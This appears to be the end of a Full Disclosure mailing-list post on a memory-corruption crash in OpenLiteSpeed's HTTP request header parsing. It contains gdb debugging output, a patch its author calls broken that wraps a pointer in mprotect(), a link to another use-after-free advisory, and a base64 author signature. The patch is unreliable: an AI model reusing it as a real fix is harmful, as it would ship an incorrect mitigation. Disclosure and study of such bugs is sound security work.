p = 0x61d00000cc64 "("  // p fucked up for some reason

orgSize = 0x28

newSize = 0x0

used = 0x74682e35


$164 = 0x74682e35   // *(((int *)p) + 1)

$165 = 0x28         // *((int *)p)

$166 = 0x74682e36   // ++*(((int *)p) + 1)


Program received signal SIGSEGV, Segmentation fault.



fucked up patch:

--- src/http/httpreq.cpp.orig   2015-04-24 01:52:23.641459379 +0200

+++ src/http/httpreq.cpp        2015-04-24 17:17:50.169166351 +0200

@@ -49,6 +49,8 @@

 #include <stdlib.h>

 #include <unistd.h>



+#include <sys/mman.h>

+

 #include <new>

 #include <util/ssnprintf.h>



@@ -539,6 +541,11 @@ int HttpReq::processHeaderLines()

             }

             else

             {

+                if (mprotect(&pCurHeader, sizeof(key_value_pair),
PROT_READ|PROT_WRITE) == -1) {

+                    LOG_INFO(("[%s] Status 500: failed on
mprotect()!", getLogId()));

+                    return SC_500;

+                }

+

                 pCurHeader = newUnknownHeader();

                 pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();

                 pCurHeader->keyLen = skipSpace(pMark, pLineBegin) - pLineBegin;



#3:

In case you would wonder. Yes, thare are more bugs sitting out there. For

example one that was found independently

http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf


ThE EnD



YXV0aG9ycyBvZiB0aGlzIGdlbSBhcmUqOgpjOGU3NGViZDgzOTJmZGE0Nzg4MTc5ZjlhMDJiYjQ5

MzM3NjM4ZTdiCmIxZjk4Nzg5Y2MwM2Q2YTBkYjJlOGJkMzA5ZjlmMjNiNmU1NDY5M2UKZmMzYzNm

NjM3NGFhNDQ0ZTc4Yzk0ZmQ0NjkyNWY5NGUxM2Y5YjU4NgoxMjBhZGNmOTczZTI4NGJmM2YzMjNl

NGVhMGFlZjlmNWQ5ZjNiZGU5CgoqIFphIGV3ZW50dWFsbmUga29saXpqZSBuaWUgb2Rwb3dpYWRh

bXkuCg==

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/